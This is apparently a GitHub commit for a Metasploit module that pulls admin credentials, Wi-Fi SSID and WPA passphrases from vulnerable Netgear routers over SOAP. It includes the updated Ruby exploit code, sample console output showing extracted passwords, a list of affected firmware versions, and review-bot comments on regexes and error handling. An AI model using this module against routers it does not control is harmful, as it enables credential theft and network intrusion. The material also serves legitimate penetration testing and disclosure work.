Commit 9862a2f

Land rapid7#7080, Updated docs and made enhancements for Netgear soap password extractor
2 parents 78bfced + fdce5bc commit 9862a2f

2 files changed

+47
-20
lines changed

Lines changed: 18 additions & 18 deletions
@@ -1,21 +1,17 @@
11
## Vulnerable Application
22

33
The following list is a non-exhaustive list of vulnerable Netgear devices:
4-
1. R6300v2 - V1.0.3.8
5-
2. WNDR3300 - V1.0.45
6-
3. WNDR3700v1 - V1.0.7.98
7-
4. WNDR3700v1 - V1.0.16.98
8-
5. WNDR3700v2 - V1.0.1.14
9-
6. WNDR3700v4 - V1.0.1.42
10-
7. WNDR3700v4 - V1.0.0.4SH
11-
8. WNDR3700v4 - V1.0.1.52
12-
9. WNDR3800 - V1.0.0.48
13-
10. WNDR4300 - V1.0.1.60
14-
11. WNR1000v2 - V1.0.1.1
15-
12. WNR1000v2 - V1.1.2.58
16-
13. WNR2000v3 - v1.1.2.10
17-
14. WNR2200 - V1.0.1.88
18-
15. WNR2500 - V1.0.0.24
4+
1. R6300v2 < [1.0.3.28](http://kb.netgear.com/app/answers/detail/a_id/28372)
5+
2. WNDR3300 - V1.0.45 (current, confirmed vuln)
6+
3. WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
7+
4. WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
8+
5. WNDR3700v4 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28355)
9+
6. WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
10+
7. WNDR4300 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28037)
11+
8. WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
12+
9. WNR2000v3 < [1.1.2.12](http://kb.netgear.com/app/answers/detail/a_id/30024)
13+
10. WNR2200 < [1.0.1.96](http://kb.netgear.com/app/answers/detail/a_id/28036)
14+
11. WNR2500 < [1.0.0.32](http://kb.netgear.com/app/answers/detail/a_id/28351)
1915

2016
## Verification Steps
2117

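Review bot: the rewritten device list mixes two notations without explaining either. Entries such as `R6300v2 < [1.0.3.28]` give an upper bound with a KB link, while `WNDR3300 - V1.0.45 (current, confirmed vuln)` names specific tested versions, and only that one entry keeps the `V` prefix. Add a sentence above the list stating what `<` means (if the linked version is the first fixed release, say so, since a reader triaging an inventory will otherwise have to open each link), and apply or drop the `V` prefix consistently. The "current" and "EOL" tags would also benefit from a date, because they go stale.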
@@ -39,11 +35,15 @@ msf auxiliary(netgear_soap_password_extractor) > run
3935
[*] Extracting Firmware version...
4036
[+] Model wnr2000v3 found
4137
[+] Firmware version V1.1.2.10 found
42-
[+] Device details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_dev_668524.txt
38+
[+] Device details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_dev_000157.txt
4339
[*] Extracting credentials...
4440
[*] Credentials found, extracting...
4541
[+] admin / password credentials found
46-
[+] Account details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_acc_252579.txt
42+
[+] Account details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_acc_387111.txt
43+
[*] Extracting Wifi...
44+
[+] Wifi SSID: NETGEAR44
45+
[+] Wifi Encryption: WPA2-PSK
46+
[*] Extracting WPA Keys...
47+
[+] Wifi Password: netgearpassword22
4748
[*] Auxiliary module execution completed
48-
4949
```
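Review bot: in the updated sample output, the new "Wifi SSID", "Wifi Encryption" and "Wifi Password" lines are printed only, while the device and account details just above each report a loot file path. The docs should say explicitly that the wireless values are shown on the console and not saved, or the module should store them so the output is consistent; as written a reader cannot tell whether the missing path is intentional.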

modules/auxiliary/admin/http/netgear_soap_password_extractor.rb

Lines changed: 29 additions & 2 deletions
@@ -37,9 +37,11 @@ def initialize
3737
'Author' =>
3838
[
3939
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery
40-
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
40+
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
41+
'h00die <[email protected]>' # Metasploit enhancements/docs
4142
],
42-
'License' => MSF_LICENSE
43+
'License' => MSF_LICENSE,
44+
'DisclosureDate' => 'Feb 11 2015'
4345
)
4446
end
4547

@@ -55,6 +57,16 @@ def run
5557
action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'
5658
print_status("Extracting credentials...")
5759
extract_data(action)
60+
61+
# extract wifi info
62+
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'
63+
print_status("Extracting Wifi...")
64+
extract_data(action)
65+
66+
# extract WPA info
67+
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'
68+
print_status("Extracting WPA Keys...")
69+
extract_data(action)
5870
end
5971

6072
def extract_data(soap_action)
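Review bot: the two added requests in `run` are issued unconditionally, so when the earlier `extract_data(action)` call has already failed (the visible rescue in `extract_data` just returns on `::Rex::ConnectionError`), the module still makes two more attempts against the same host. Have `extract_data` return a success value and stop on the first failure. The action / `print_status` / `extract_data` triplet is now repeated several times and would read better as a loop over a list of action and label pairs.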
@@ -93,6 +105,21 @@ def extract_data(soap_action)
93105
print_good("Device details downloaded to: #{loot}")
94106
end
95107

108+
if res.body =~ /<NewSSID>(.*)<\/NewSSID>/
109+
ssid = $1
110+
print_good("Wifi SSID: #{ssid}")
111+
end
112+
113+
if res.body =~ /<NewBasicEncryptionModes>(.*)<\/NewBasicEncryptionModes>/
114+
wifi_encryption = $1
115+
print_good("Wifi Encryption: #{wifi_encryption}")
116+
end
117+
118+
if res.body =~ /<NewWPAPassphrase>(.*)<\/NewWPAPassphrase>/
119+
wifi_password = $1
120+
print_good("Wifi Password: #{wifi_password}")
121+
end
122+
96123
rescue ::Rex::ConnectionError
97124
vprint_error("Failed to connect to the web server")
98125
return
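Review bot: the three new matches use a greedy `(.*)`, for example `/<NewWPAPassphrase>(.*)<\/NewWPAPassphrase>/`, which captures too much if the element appears more than once on a line; use `(.*?)` or `([^<]*)`. The captured values are also printed exactly as they appear in the SOAP body, so an SSID or passphrase containing `&` or `<` will be shown in its XML-escaped form and needs decoding before display. Unlike the device details handled just above with `print_good("Device details downloaded to: #{loot}")`, these values are only printed and never stored, and all three checks run on every response regardless of which `soap_action` was requested.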
